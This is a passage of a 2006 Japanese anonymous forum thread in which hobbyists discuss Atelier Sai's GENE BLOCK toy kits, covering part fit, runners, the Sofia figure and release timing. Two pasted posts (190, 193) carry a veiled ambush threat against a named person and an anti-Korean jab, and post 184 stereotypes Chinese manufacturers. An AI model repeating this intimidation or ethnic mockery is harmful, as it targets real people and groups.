おー!サンクス!!見てきたよー。
1月発売の2種も発表済みだったんだね。
しかし、そんな短期間のうちに次が出るなんて大丈夫か?俺の財布・・・

121 :ぼくらはトイ名無しキッズ:2006/11/13(月) 21:19:14 ID:yYZwpBh+0
財布よりも心配なのがクオリティ・・・orz

122 :ぼくらはトイ名無しキッズ:2006/11/13(月) 21:51:59 ID:fEWNTxgn0
ははは、確かにそうだね>クオリティ
12月の新作を見て財布が心配になるようなら、むしろそれは
喜ばしいことってことか。

123 :ぼくらはトイ名無しキッズ:2006/11/14(火) 20:41:10 ID:laQlw+rW0
公式更新しとるー

124 :ぼくらはトイ名無しキッズ:2006/11/14(火) 21:06:37 ID:D7rx8+lV0
やっぱりこのパターンか('A`)
まあ精度が確保されてれば選択肢が増えるのは良いことなんだが、
その点彩を信用するのは乞食に金をせびるようなもんだからなあ…

125 :ぼくらはトイ名無しキッズ:2006/11/14(火) 21:20:37 ID:Ku4pCNl5O
ギャルktkr!
っても…レイキャシだよなコレ…
いや、マスプロで汁っぽいロボっ娘が出ること自体は大歓迎なのだが、コレはあまりにも…ねぇ(苦笑

ハッ! これはまさか幻のブロックドレス再起動への布石なのか!?
(注:んなこたーない)

126 :ぼくらはトイ名無しキッズ:2006/11/14(火) 21:49:49 ID:D42YkU+Q0
ハダカじゃないところが好み。

127 :ぼくらはトイ名無しキッズ:2006/11/14(火) 22:31:58 ID:unz/e+mi0
ランナーも商品数も出せるだけ出してゴタゴタする前に売りぬける気か?
こんなハイペースじゃランナーの不具合の見直しも出来ないだろうに…

128 :ぼくらはトイ名無しキッズ:2006/11/14(火) 23:05:31 ID:4XEzhNlk0
どうせレイキャシっぽいの出すなら、フェイイェンっぽいのも頼むw

129 :ぼくらはトイ名無しキッズ:2006/11/14(火) 23:09:12 ID:Y66gBbi80
>>128
そこは自分でがんばってみようよ。
一応ブロック玩具をうたってるし。

130 :ぼくらはトイ名無しキッズ:2006/11/14(火) 23:10:16 ID:laQlw+rW0
なんか好評だな、ジェネ女体。
確かにこっちの方が格好良いもん。

131 :ぼくらはトイ名無しキッズ:2006/11/14(火) 23:17:11 ID:4XEzhNlk0
>>129
力不足で…グリスボックみたいのしか作れないんだ…

132 :ぼくらはトイ名無しキッズ:2006/11/14(火) 23:48:13 ID:b21g2qhu0
これで精度さえ良ければ神シリーズ

133 :ぼくらはトイ名無しキッズ:2006/11/15(水) 00:16:47 ID:4Oz0oBYz0
しかし、来年の2月はずいぶん先だなー。
時間はたっぷりあるから精度向上に努めて欲しいもんだ。

134 :ぼくらはトイ名無しキッズ:2006/11/15(水) 00:22:51 ID:TiswMR+M0
>>133
いやいや、これはBJPMよりハイペースだよ。

135 :ぼくらはトイ名無しキッズ:2006/11/15(水) 00:56:05 ID:GBdyEsAM0
GSDと違って、安心して欲しいときに女体買えるのってすごい便利だな。
アソート気にしないですむ。EX系はかぶってもレシピぐらいだし。


136 :ぼくらはトイ名無しキッズ:2006/11/15(水) 00:57:58 ID:dyUWISaq0
説明よく分からんねんけど
ランナー3枚中一枚で本体完成するの?
だったらそれだけで出しとくれよ……
やっぱ以前と同じく女体出し惜しみするのかw

137 :ぼくらはトイ名無しキッズ:2006/11/15(水) 01:21:30 ID:t7h/DwqP0
てか女体だけブラインド形式かな?いずれかのカラーが入ってますって…

来年2月は両手がドリルのソフィアがそこかしこに溢れる気がするぜ

138 :ぼくらはトイ名無しキッズ:2006/11/15(水) 08:38:23 ID:GBdyEsAM0
なんだかんだでもう来月リリースなんだよな…
最初はアンチ気味だったが少しずつ惹かれてる俺ガイル。

あぁ、早く欲しいなぁ。

139 :ぼくらはトイ名無しキッズ:2006/11/15(水) 09:12:51 ID:dyUWISaq0
公式に小さくてまとまりのいい意匠の
パーツを多くて十数個でミニロボ/ミニキャラやってくれないかなぁ
んでビークル⇔ロボとか変形するデカ物とセット組みとか

140 :ぼくらはトイ名無しキッズ:2006/11/15(水) 13:47:53 ID:k5SSt/g/0
泥棒会社。
モラル零が証明されたな。

141 :ぼくらはトイ名無しキッズ:2006/11/15(水) 13:52:05 ID:k5SSt/g/0
浅井レイキャシと武装神姫BLACKそっくりだね。
ほんと、そ っ く リ だ ね 。

142 :ぼくらはトイ名無しキッズ:2006/11/15(水) 17:08:55 ID:Eermtx+s0
うおおソフィア凄いよ
あって当たり前の企画を本当にやってくれる所が強みだね

ryojiクラスまでの脚の太さとか
フラットから巨乳までの胸サイズとか
バリエーション展開で組み替えできたら
もう女体に思い残すことはないな……

143 :ぼくらはトイ名無しキッズ:2006/11/15(水) 17:21:42 ID:JaSaf3DwO
肉抜き穴有だし、単色だし、イラネ
もっとマシなのだせや

144 :ぼくらはトイ名無しキッズ:2006/11/15(水) 17:49:59 ID:iUeUwN2e0
ま、ロボ志向のオレとしては、そうまさんのサイトが更新されて
いることの方が気になるんだが・・・

145 :ぼくらはトイ名無しキッズ:2006/11/15(水) 17:59:41 ID:7gLsIhrx0
女体としての出来は良いかもしれないが、汎用性は極めて低そうだ。

ソフィア顔の機関車ぐらいしか作れそうにないな

146 :ぼくらはトイ名無しキッズ:2006/11/15(水) 18:02:06 ID:/3ZYE8/X0
ま、評価は発売されて入手してからの話だな。
変な先入観があると楽しめないからな

147 :ぼくらはトイ名無しキッズ:2006/11/15(水) 18:05:18 ID:7gLsIhrx0
って、今そうま氏のサイトを見てきたら何とアクチュエータが付くのか。これは「買い」だ

148 :ぼくらはトイ名無しキッズ:2006/11/15(水) 18:37:35 ID:JaSaf3DwO
アクチュエーターのページで成形がなんたらのくだりがあるけど
それは精度がうpしてるって事?
せめてスティックファス精度ぐらいあったら褒めてやろう
ただエクストルーパー辺りまでしか持続出来ないかもねなにせ彩だし(笑)

149 :ぼくらはトイ名無しキッズ:2006/11/15(水) 19:21:46 ID:GBdyEsAM0
21 :ぼくらはトイ名無しキッズ:2006/10/28(土) 14:06:48 ID:Oq7MmgX10
保持力はスティックファスに近いものを感じる。

150 :ぼくらはトイ名無しキッズ:2006/11/15(水) 22:19:49 ID:4Oz0oBYz0
アクチュエータに精度もなにも無いんじゃ?
抜け止めにはなっていたけどユルユルだったし。

151 :ぼくらはトイ名無しキッズ:2006/11/15(水) 22:27:58 ID:/3ZYE8/X0
>>150
そんな事を今から心配してどうする?

152 :ぼくらはトイ名無しキッズ:2006/11/15(水) 22:34:44 ID:4Oz0oBYz0
いや、心配しているわけじゃないけど。
アクチュエータの精度を云々する必要はないのでは?と言いたかっただけ。

アクチュエータのボールの付き方が変更になってるね。

153 :ぼくらはトイ名無しキッズ:2006/11/15(水) 22:45:02 ID:6LkHq1h60
よく見るとジェネのページにでかでかと出ている「ソフィア」を組むには最低2箱買わなきゃいけないのね。
塗装や染色するなら別だけど。

154 :ぼくらはトイ名無しキッズ:2006/11/15(水) 23:01:29 ID:tAwGTYwmO
あの「ソフィア」は再現不可能だろ?
例えツートンカラーだから2ランナー必要と仮定しても、あの分割は無理だろうし
ましてや膝のパーツがボールだけ色が違うのはアリエナイ

155 :ぼくらはトイ名無しキッズ:2006/11/15(水) 23:01:42 ID:Pybpg6v00
とりあえずGSD2.0くらいの精度はあるのかな…?
それなら嬉しい。ソフィアが非常に欲しいw

156 :ぼくらはトイ名無しキッズ:2006/11/15(水) 23:06:10 ID:Pybpg6v00
連投すまんが、

>>154
153が言いたいのは、単純にホワイト+ライトブルーの
組み合わせがデフォルトで存在しないってことでは?

157 :ぼくらはトイ名無しキッズ:2006/11/15(水) 23:43:50 ID:6LkHq1h60
>>156
だいたいその通り。
厳密に言えば目や口も色違うしw
ソフィア用ランナー(GB-13)一枚+バーサーク用ランナー(GB-14)二枚だから、
一箱では詳細ページにある単色ソフィアしか組めないのよね。

158 :ぼくらはトイ名無しキッズ:2006/11/16(木) 01:29:35 ID:0dXbGQOb0
でもコレなら、単色のホワイトを塗装してもいいかもしれない
あと頭部がツインテールな、ソフィアの姉妹機が出るのを期待してみたり

159 :ぼくらはトイ名無しキッズ:2006/11/16(木) 04:43:34 ID:HAx+nC1V0
EXサーバントってランナー3枚になってるけど、
ランナーの番号と値段からすると外装ランナーはGSD2やGSD3みたいに半分ランナーの組み合わせっぽいな。

160 :ぼくらはトイ名無しキッズ:2006/11/16(木) 05:03:46 ID:HAx+nC1V0
サーバントじゃなくてトルーパーね。
フレーム1枚+外装半枚(4種)×2の組み合わせだと思う。

161 :ぼくらはトイ名無しキッズ:2006/11/16(木) 07:51:13 ID:I46kuyrY0
ソフィアはともかくバーサークユニットが良く分からんなァ
ランナー二枚追加してるのにソフィアとあんま変わってないって言うのは腑に落ちんし
だいたいロボ女体に角/爪タイプって相性どうなんだろう?
開けてみて脈絡ないパーツ突っ込んであってガッカリか
それとも予想外に便利なパーツ一杯でウハウハのどっちになるんだろ?

162 :ぼくらはトイ名無しキッズ:2006/11/16(木) 08:43:23 ID:7vkjtLUI0
ソフィアは他のロボ連中と並べるには浮くなあ…
どうせならこういうデザインラインで男性型も欲しいが。

163 :ぼくらはトイ名無しキッズ:2006/11/16(木) 09:22:02 ID:Hc+e0+hV0
人型は人型で体型違いでシリーズ化していいとオモ

おそらくロボと同じかそれ以上の需要あり

164 :ぼくらはトイ名無しキッズ:2006/11/16(木) 10:16:25 ID:XKqjVRnsO
組み替えが足と手か楽しめないとはどういう事だ
ここらへんちゃんと練られてないのがわかるな
みこしろ万歳^^

165 :ぼくらはトイ名無しキッズ:2006/11/16(木) 12:20:00 ID:HAx+nC1V0
ソフィアとバーサークでは髪型違うけど、それがソフィアランナーに含まれるのかバーサークランナーに含まれるのか。
他のと違って色で判断できないからなー。

166 :ぼくらはトイ名無しキッズ:2006/11/16(木) 16:00:55 ID:0dXbGQOb0
ソフィアなんかは組み換えの自由度が低い分、
塗装して他のフィギュアとからめるネタに使えそうだ

双葉の模型裏あたりに

167 :ぼくらはトイ名無しキッズ:2006/11/16(木) 21:59:21 ID:YwmKfuL60
ソフィアベースで変形物とか作ったら面白そうだ
制約が多いほうが萌え…燃えるぜ

168 :ぼくらはトイ名無しキッズ:2006/11/16(木) 22:01:01 ID:XKqjVRnsO
アーシーwwwwwwww

169 :ぼくらはトイ名無しキッズ:2006/11/17(金) 00:29:19 ID:smUjBLHh0
ジェネの話題なのに、BJPMスレの方が盛り上がっているフシギ・・・

170 :ぼくらはトイ名無しキッズ:2006/11/17(金) 14:46:12 ID:16Uv1EMp0
あのスレは巫代狂信者ばっかりだからね
なんかかんか理由をつけてはジェネを叩きまくってる

見ててキモイ

171 :ぼくらはトイ名無しキッズ:2006/11/17(金) 14:51:57 ID:j7nUuyTk0
こっちに叩きにこないだけマシだろうよ。


172 :ぼくらはトイ名無しキッズ:2006/11/17(金) 14:53:02 ID:1OtRMGo90
なんかかんか理由をつけては ×
なんかかんか理由を見つけては ○ 

目立つもんなぁ
理由w

173 :ぼくらはトイ名無しキッズ:2006/11/17(金) 15:09:24 ID:16Uv1EMp0
叩きに来てる

174 :ぼくらはトイ名無しキッズ:2006/11/17(金) 16:37:51 ID:UgeAz8/9O
あのBJ部の品質の低さを見ないふりしてる事こそ
信者乙と言いたくなる

もう少し頑張って欲しいな
品質さえ完全ならかなり良い商品なんだし

175 :ぼくらはトイ名無しキッズ:2006/11/17(金) 17:08:49 ID:vUSPG1870
>品質さえ完全ならかなり良い商品なんだし
当たり前のこと言うな(w

176 :ぼくらはトイ名無しキッズ:2006/11/17(金) 18:11:36 ID:UgeAz8/9O
当たり前の事が当たり前にされていれば
どんなにか幸せだったことだろう

彩にはその当たり前を頑張って欲しいのです

177 :ぼくらはトイ名無しキッズ:2006/11/17(金) 19:53:30 ID:hAzkGilx0
>当たり前の事が当たり前にされていれば

ジェネブロックは生まれていなかったろうw

178 :ぼくらはトイ名無しキッズ:2006/11/17(金) 20:24:00 ID:UgeAz8/9O
それを言っちゃーおしまいよ(笑)

179 :ぼくらはトイ名無しキッズ:2006/11/17(金) 22:53:40 ID:smUjBLHh0
12月発売といっても「あと半月」〜「あと1ヵ月半」と幅が広いorz
ジェネがリリースされるまではココはマッタリ進行しかないか。

180 :ぼくらはトイ名無しキッズ:2006/11/17(金) 23:31:32 ID:VVKTXjlh0
>あのBJ部の品質の低さを見ないふりしてる事こそ

その低品質のBJを出した彩からジェネも出るわけだが

181 :ぼくらはトイ名無しキッズ:2006/11/17(金) 23:35:52 ID:IuA88upj0
まぁようするに、勿体無いと思われてるんだよな、ジェネは…
アンチからも信者からも

まぁ品質がわるかろうと、最悪固定オブジェにしてでもソフィアは買うさ

182 :ぼくらはトイ名無しキッズ:2006/11/17(金) 23:55:02 ID:smUjBLHh0
そこで国産化なわけですよ。

183 :ぼくらはトイ名無しキッズ:2006/11/18(土) 00:03:00 ID:zqddylg00
だから中国産でもちゃんと作らせれば下手したら同人版よりいい出来になるし
国産でもダメなところに作らせれば現状彩クオリティより駄目になると(ry

184 :ぼくらはトイ名無しキッズ:2006/11/18(土) 00:25:17 ID:v3DlG6KV0
中国人はパチもん作る時の方がいい仕事するような気がする。
これは偏見だろうか。

185 :ぼくらはトイ名無しキッズ:2006/11/18(土) 00:31:34 ID:MINieICU0
>>184
ttp://www.avg-hotgame.net/blogview.asp?logID=185
確かに。

186 :ぼくらはトイ名無しキッズ:2006/11/18(土) 00:44:38 ID:IdoORyHG0
>>183
でも同じメーカーがやるんなら、国産と中国産ではハッキリ違いが出ると思うよ?
中国産で気合いれて作って同人版より良くなったら
国産で気合いれたらそれより良くなるだろ

彩に能力が無い以上、国産にするメリットはあるはず

187 :ぼくらはトイ名無しキッズ:2006/11/18(土) 00:46:57 ID:8XCdAX720
じゃぁ、国産BJPMも安心できないってこと?
最初のは同人版の再販だから問題ないんだろうけど。

188 :ぼくらはトイ名無しキッズ:2006/11/18(土) 00:54:28 ID:8XCdAX720
>>187 はスレ違いだった。スマソ。

彩にジェネの国産化を望むこと自体が無理な話だと思うけど。
レジンで作ったりして('A`)

189 :ぼくらはトイ名無しキッズ:2006/11/18(土) 01:02:17 ID:v3DlG6KV0
>>185
ワロタw
中国人を甘く見てたw

190 :ぼくらはトイ名無しキッズ:2006/11/19(日) 04:48:11 ID:AoTgVcR20
http://ex9.2ch.net/test/read.cgi/net/1161715371/567
567 :名無しさん@ゴーゴーゴーゴー!:2006/11/19(日) 02:18:48 ID:YRu+zLyg
まったくも〜ヒロフミは死ねとかすぐいいすぎw
むしろそんないちびりばっかやってると
闇討ち食らうかもよw
ヒロフミはこっちのこと誰か分かってないみたいだけど
こっちはヒロフミのことよく知っているんだから
やろうと思えば可能なんだよ?
警察が守ってくれるニダって吠えるかもしれないけど
ヤられてから捜査してもらっても遅いことも有るんだよ(^o^)

191 :ぼくらはトイ名無しキッズ:2006/11/19(日) 17:36:26 ID:qpuioeVd0
BJPMスレでやってくれ

192 :ぼくらはトイ名無しキッズ:2006/11/19(日) 18:22:48 ID:uxIF44xG0
いやBJPMにもくるな

193 :ぼくらはトイ名無しキッズ:2006/11/19(日) 18:51:56 ID:w8dpogcJ0
http://ex9.2ch.net/test/read.cgi/net/1161715371/571
571 :名無しさん@ゴーゴーゴーゴー!:2006/11/19(日) 13:07:23 ID:AIFbZMMr
「情報提供」部位を故意に「通報」と書き換えて
対象者を脅迫するナチュラル犯罪者ヒロフミ乙

揚句警察が〜の一文にひっかからないように
警察機構以外をわざわざ選ぶとはご苦労様

194 :ぼくらはトイ名無しキッズ:2006/11/19(日) 18:56:41 ID:jT+WwU1u0
>>161
>だいたいロボ女体に角/爪タイプって相性どうなんだろう?

ぱっと見、武装神姫の黒子だな。

195 :ぼくらはトイ名無しキッズ:2006/11/20(月) 16:18:38 ID:QsI8EBYq0
ミクロマンにあわせてパワーローダー作るよりかは、ソフィアにあわせたほうが馴染みそう

196 :ぼくらはトイ名無しキッズ:2006/11/21(火) 15:17:38 ID:u+W3awXaO
ソフィアも足首とか組み替えてやれば
もっとよくなる可能性が見えてきた

あの膝も現状の彩品質でも保持してくれるみたいだし
顔パーツの出来上がり次第でかなり良い線を行くのではなかろうか

出来るなら以後ソフィアランナーと同梱するのは
変え頭部付きの武装セットがいいなー
まーよりアレっぽい感じになるけど気にしない方向で(笑)

197 :ぼくらはトイ名無しキッズ:2006/11/21(火) 18:58:00 ID:DBaI1Hrp0
髪型が複数あるといいな
それか、髪型を作れそうな自由度のある頭部とか

198 :ぼくらはトイ名無しキッズ:2006/11/22(水) 18:50:47 ID:1LDfUzHh0
僕の肛門も複数あるといいです

199 :ぼくらはトイ名無しキッズ:2006/11/23(木) 06:06:36 ID:ANs4MHzW0
とりあえずソフィア(含バーサーク)で
・ショートヘア+短いポニテ
・セミロング
の2種類あるよな。

200 :ぼくらはトイ名無しキッズ:2006/11/25(土) 14:34:33 ID:jIC8sxuS0
実はバーサークランナーは
爪以外にも嬉しいパーツ(変えの髪・靴・武器類・リュック等の小物)がみっしり
という白昼夢を見ている

201 :ぼくらはトイ名無しキッズ:2006/11/25(土) 19:54:39 ID:jKATtlIe0
よし、精神科行け。

202 :ぼくらはトイ名無しキッズ:2006/11/25(土) 22:13:25 ID:7HygA+M0O
作れば良いじゃない

203 :ぼくらはトイ名無しキッズ:2006/11/26(日) 04:32:56 ID:MciviwBIO
舞姫のパクリイラネ

204 :ぼくらはトイ名無しキッズ:2006/11/27(月) 16:07:09 ID:hyjypzzZO
イラネっていうヤツはどういうスタンス?

205 :ぼくらはトイ名無しキッズ:2006/11/27(月) 16:33:51 ID:seT6mopg0
ていうか舞姫って?

206 :ぼくらはトイ名無しキッズ:2006/11/28(火) 02:30:58 ID:tGdVdQD60
>>205
森鴎外に謝れ

207 :ぼくらはトイ名無しキッズ:2006/11/28(火) 14:36:21 ID:Io1mUmIs0
次スレ用テンプレ

■このスレはファンの交流場所として、作例の公開等に活用してください。
■2chの特性を生かし 挨拶抜きで気軽に参加OK!!
■荒らし・煽り・釣り・粘着・私怨叩き・紙々・ヒロフミは完全スルー
■次スレは950前後で宜しく。

208 :ぼくらはトイ名無しキッズ:2006/11/28(火) 15:57:24 ID:mWghhUOf0
>>206
ゴメン森。
でもげねぶろのどの辺が鴎外のパクリなんだ?

209 :ぼくらはトイ名無しキッズ:2006/11/28(火) 21:54:21 ID:f9por2ym0
実際読んでみれば分かるのかも!

210 :ぼくらはトイ名無しキッズ:2006/11/28(火) 23:12:49 ID:mWghhUOf0
現地妻が追ってくる話だったよ…

211 :ぼくらはトイ名無しキッズ:2006/11/29(水) 00:18:25 ID:NTvMYYb+0
サイトが更新されてサンプルの画像が出てますよ。

212 :ぼくらはトイ名無しキッズ:2006/11/29(水) 05:28:37 ID:ZkLTWu300
やっぱりEXトルーパーはフレーム用ランナー1枚と半分ランナー2枚の組み合わせか。

213 :ぼくらはトイ名無しキッズ:2006/11/29(水) 10:03:57 ID:vC2D1tteO
あんなのコロンブスの卵でもなんでもないだろ
モロランナーだってパクリ杉
ゴミ同然だぁな
イラネーなこりゃ

214 :ぼくらはトイ名無しキッズ:2006/11/29(水) 13:15:03 ID:psKgY5H/0
>>207はキチガイで有名な紙々工務店だからみんな注意しようね

215 :ぼくらはトイ名無しキッズ:2006/11/29(水) 13:31:21 ID:VZkCtMnd0
パーツは使いやすそうなんだよね
やっぱ問題は合い

216 :ぼくらはトイ名無しキッズ:2006/11/29(水) 19:00:46 ID:+gH17SFU0
サンプルだけどやっぱ現物の写真見るとテンション上がる
早ければ来週ぐらいには出るかね

217 :ぼくらはトイ名無しキッズ:2006/11/29(水) 20:06:51 ID:8BNkZjSW0
安いし中見えるし、数そろえて量産型ごっこが出来ると思うとwktkしてるぜ?俺は

218 :ぼくらはトイ名無しキッズ:2006/11/29(水) 23:40:50 ID:bmXu/bX00
オレモダ

219 :ぼくらはトイ名無しキッズ:2006/11/30(木) 00:21:49 ID:+zo745UYO
制作者の自演乙w

220 :217:2006/11/30(木) 02:09:31 ID:WwVOXjHS0
>>219
いやマジでw
彩版BJPMは色違いとか中身がランダムとかで量産型ごっこが出来なかったからさ

221 :ぼくらはトイ名無しキッズ:2006/11/30(木) 08:59:11 ID:2F6RbXgK0
山程買えばよろしい。


後悔するがな!

222 :ぼくらはトイ名無しキッズ:2006/11/30(木) 10:00:25 ID:+zo745UYO
自演で続いたスレで222ゲット!!

223 :ぼくらはトイ名無しキッズ:2006/11/30(木) 11:54:55 ID:hhF/3kaE0
そうまさん更新キター!
とりあえずブログだけになっちゃったけど・・・

224 :ぼくらはトイ名無しキッズ:2006/11/30(木) 11:58:06 ID:aoan3BTj0
彩版BJPM程度の精度でもFソルジャーくらいならたくさん買っても良いかなとは思う。
が、ヴァリアブルユニットはやっぱり二の足を踏むなあ。ヘビガの前例もあるし。

225 :ぼくらはトイ名無しキッズ:2006/11/30(木) 13:29:19 ID:WwVOXjHS0
GSD2ぐらいの精度は最低限維持してほしいね…

226 :ぼくらはトイ名無しキッズ:2006/11/30(木) 15:02:48 ID:2F6RbXgK0
無理だワニの腕立て伏せ

227 :ぼくらはトイ名無しキッズ:2006/11/30(木) 21:23:40 ID:ef8pUZWs0
ちょw何そのカメの腹筋wwwww

228 :ぼくらはトイ名無しキッズ:2006/11/30(木) 22:23:25 ID:CDX82VFLO
人魚のセッk(ry

229 :ぼくらはトイ名無しキッズ:2006/11/30(木) 22:55:59 ID:5txE2Ixa0
結構、年齢層が高いな。
ま、わかるオレもそれなりだが。

230 :ぼくらはトイ名無しキッズ:2006/12/01(金) 00:33:15 ID:hA+dTBWI0
さぁ、残っていたBJPMは片付いたみたいだから、GENEBLOCKに全神経を集中しようね>彩
遅れちゃダメだよ。

231 :ぼくらはトイ名無しキッズ:2006/12/01(金) 00:43:47 ID:xK7euBX1O
サイフ忘れるなよ

232 :ぼくらはトイ名無しキッズ:2006/12/04(月) 23:55:43 ID:Pd/rCtyPO
発売時期的にWHF有明参加&販売っていうのはないだろうか。

WHF行くつもりだから気になってるんだけど。

233 :ぼくらはトイ名無しキッズ:2006/12/05(火) 02:01:58 ID:zo1U1Mua0
WHFはわからないけど、WFではSOFIAをベースに何かあるんじゃないかと
期待してる。カラバリとか、オプション武器とか・・・

234 :ぼくらはトイ名無しキッズ:2006/12/05(火) 23:04:39 ID:zo1U1Mua0
WHFに彩は出るの?
そうまさんはディーラー参加してきたみたいだけど、今回はどうなんだろう?
GENE BLOCKのデザイナーという立場になって、自分で売らないようになったん
だろうから、WHFには参加しないんじゃない?

235 :ぼくらはトイ名無しキッズ:2006/12/06(水) 22:37:12 ID:tEcxTM9F0
今気付いたんだけどgeneblockサイトの下部にある(c)アトリエ彩の下に
CONCEPT DESIGN SOUMAってあるね。

236 :ぼくらはトイ名無しキッズ:2006/12/08(金) 23:32:30 ID:gl2jxCNJ0
なかなか出てこないな。

237 :ぼくらはトイ名無しキッズ:2006/12/09(土) 00:05:41 ID:h7j6qNmI0
GSD2.5も11月って言ってて実際出たの30日だったからな
今年中に買えれば良いと考えたほうが良さそう

238 :ぼくらはトイ名無しキッズ:2006/12/09(土) 00:58:32 ID:ELrNGBPY0
まだ10日もたってないのに「なかなか出ない」ってどんな早漏だよw

まあ年内に出れば正月休みに組んだりバラしたり組んだりバラしたり壊したりできるさ。

239 :ぼくらはトイ名無しキッズ:2006/12/09(土) 01:09:41 ID:UqvmrXOT0
虎の穴なんば店にFソルジャーシリーズが展示してあった。
BJPMより意匠の強いバーツが多いし、モールドもうるさいくらい入ってって、
BJPMとはかなり印象違うね。
個人的にはそうまさんの方に期待かな。
精度は見た感じGSD2以上同人版未満ってところでした。

240 :ぼくらはトイ名無しキッズ:2006/12/09(土) 02:26:46 ID:mTtVHmTT0
>>239
>精度は見た感じGSD2以上同人版未満ってところでした。
それが本当なら嬉しいけど、見ただけでわかるもん?触れた?

241 :ぼくらはトイ名無しキッズ:2006/12/09(土) 04:08:51 ID:6KpQ/x210
>精度は見た感じGSD2以上同人版未満ってところでした。
うそくせーw すげーうそくせーwww

242 :ぼくらはトイ名無しキッズ:2006/12/09(土) 10:39:53 ID:KD/hFbd50
いや、そんなもんじゃね?「以上」かどうかはわからんが。
つまり、品質的にはギリギリでブロックトイってレベルだと。

243 :ぼくらはトイ名無しキッズ:2006/12/09(土) 12:13:52 ID:eLVVZKhx0
見た感じだけで言えば、俺も>>239と同意見だったよ

244 :ぼくらはトイ名無しキッズ:2006/12/09(土) 12:30:03 ID:LXYFV6Zv0
いざ市販されたら何故かHG以下に劣化する彩脅威のクオリティ

というオチは勘弁して欲しい

245 :ぼくらはトイ名無しキッズ:2006/12/09(土) 13:05:53 ID:DMu8TRew0
>>240
触ってません。
だからあくまで「見た感じ」。

246 :ぼくらはトイ名無しキッズ:2006/12/10(日) 05:23:31 ID:bgJYD9sN0
結構サンプルは出回ってるみたいで、俺触らせて貰ったけど、
まあ、ホントGSD2以上同人未満って感じだった。
遊ぶ分には差し支えないと思うけど、ちょっと触っただけだから耐久度とかわかんないなあ。
あくまでサンプルなんでアテになるかはわからん所がナンだけどねえ。

247 :ぼくらはトイ名無しキッズ:2006/12/10(日) 08:53:22 ID:/64x3/ibO
サンプルがカン合調整前のテストショットと考えれば本チャンに期待できる

248 :ぼくらはトイ名無しキッズ:2006/12/10(日) 09:07:01 ID:84va1bcA0
でもGSD2も組んだままにしておくとジョイントガタガタになるんだよねぇ・・・

249 :ぼくらはトイ名無しキッズ:2006/12/10(日) 10:31:12 ID:bQLHgEL60
>>247
彩に期待するとは…とんだドMだぜ

250 :ぼくらはトイ名無しキッズ:2006/12/10(日) 11:01:44 ID:VOaExZYLO
ほんとバカだよなぁ
BJPMとして出せば遊べた物になるのに
いくら彩が動くのはやいからってネタが尽きるのは目に見えてる

251 :ぼくらはトイ名無しキッズ:2006/12/10(日) 12:46:47 ID:/64x3/ibO
>249
更に調整されると…考えれば…な……

252 :ぼくらはトイ名無しキッズ:2006/12/10(日) 15:42:20 ID:aWDk5JuE0
掃き溜めから何か出てきてるな

253 :ぼくらはトイ名無しキッズ:2006/12/11(月) 13:47:35 ID:7RefWOy9O
鶴?
ジェネシリーズの中のソフィアの事だな

254 :ぼくらはトイ名無しキッズ:2006/12/13(水) 17:14:15 ID:kEwHwOxdO
そろそろジェネ用画像掲示板用意しないとね

255 :ぼくらはトイ名無しキッズ:2006/12/13(水) 22:19:10 ID:QPHEyKoeO
必要ないよ普通のアプロダ使え

256 :ぼくらはトイ名無しキッズ:2006/12/13(水) 22:36:40 ID:vRzPQPIP0
その辺を彩に期待するのは愚かか?

257 :ぼくらはトイ名無しキッズ:2006/12/14(木) 03:36:00 ID:koN0UMSg0
>>248
同人版とGSD2で組んだやつを並べて飾っておいたら、GSD2の方だけユルユルになりやがったぜ…
GSD2は、組んで写真撮ったらすぐにバラしたほうがいいな…

258 :ぼくらはトイ名無しキッズ:2006/12/14(木) 14:33:27 ID:fsXTap+60
なぜきみたちはここでBJPMの話をしているの?

259 :ぼくらはトイ名無しキッズ:2006/12/14(木) 15:59:26 ID:koN0UMSg0
>>258
作ってる会社もコンセプトも同じだからGSDを引き合いにだしてるだけじゃね?

260 :ぼくらはトイ名無しキッズ:2006/12/14(木) 16:56:01 ID:NU7BJe7q0
それよりまだ売ってないからだろ。

261 :ぼくらはトイ名無しキッズ:2006/12/15(金) 00:02:43 ID:mBeoYRBJ0
みんな予約した?

262 :ぼくらはトイ名無しキッズ:2006/12/15(金) 22:05:53 ID:KBe98zSa0
近所の祖父に聞いてみたら、どうやらあっちと違ってジェネの入荷予定
は無いらしい…
祖父だよりの人は要注意。

263 :ぼくらはトイ名無しキッズ:2006/12/15(金) 22:37:21 ID:KBe98zSa0
公式更新キテル〜!!
欲しい

264 :ぼくらはトイ名無しキッズ:2006/12/15(金) 23:32:14 ID:ZJkhtgb60
しかも、GENEBLOCKサークルでWHF参加とは〜!
どんなメンバーなんだろう?

265 :ぼくらはトイ名無しキッズ:2006/12/16(土) 01:46:00 ID:Py9a3vBn0
ツ12-16ってことはWF2.5卓分か。お披露目以上の派手な企画はなさそうだな。

266 :ぼくらはトイ名無しキッズ:2006/12/16(土) 19:57:06 ID:A10v+xvI0
しかし公式サイト
異様に見やすくて更新も頻繁で便利だな…

267 :ぼくらはトイ名無しキッズ:2006/12/17(日) 00:20:39 ID:zIkoKvFT0
第一弾リリースは下旬か・・・
WHFと同時?それともWHFの方が先?
精度も気になるところだし、WHFで初体験してこよ

268 :ぼくらはトイ名無しキッズ:2006/12/17(日) 04:22:12 ID:e5ppWPj30
トルーパー2はでっかいフィン状パーツが面白げ。タイヤにしたいw
特徴的なパーツが多いけど、使い勝手がどうかが気になる所だな。

269 :ぼくらはトイ名無しキッズ:2006/12/17(日) 09:03:23 ID:3dVGfv1CO
トルパー→鳥、熊
トルパー2→イルカ、ワニ
こんな感じか

270 :ぼくらはトイ名無しキッズ:2006/12/17(日) 10:43:35 ID:FVEvzLys0
なんか異常に必死な社員くせーレスが散見してるなwww

271 :266:2006/12/17(日) 10:55:30 ID:Ppp6WF3w0
俺は社員じゃないよー
ただbjpm時代との、この差はなんなのかなと思ってな
明らかにボルテージが違うよな

272 :ぼくらはトイ名無しキッズ:2006/12/17(日) 10:58:04 ID:s8auOBKo0
BJPM>委託製品
GENE>自社製品
だからな
そりゃ気合の入れ方も違うだろう

273 :ぼくらはトイ名無しキッズ:2006/12/18(月) 11:12:59 ID:jcEfyd0e0
ダメだ、ラインアップ見てるだけでわくわくしてくる。
ゲネを駒にしたゲームのルールとか部隊編成とか
それにあわせた購入計画とか考えだすと止まらん。

274 :ぼくらはトイ名無しキッズ:2006/12/18(月) 18:18:20 ID:7K2w3ehK0
>>272
何か勘違いしてないか?BJPMも自社生産の自社製品だぞ。
企画がもともと社外のものだったからって、委託とは言わないだろ。

275 :ぼくらはトイ名無しキッズ:2006/12/19(火) 01:06:20 ID:4Yuz/hxs0
彩の気合の入り方はBJPMのときとは比べ物にならない
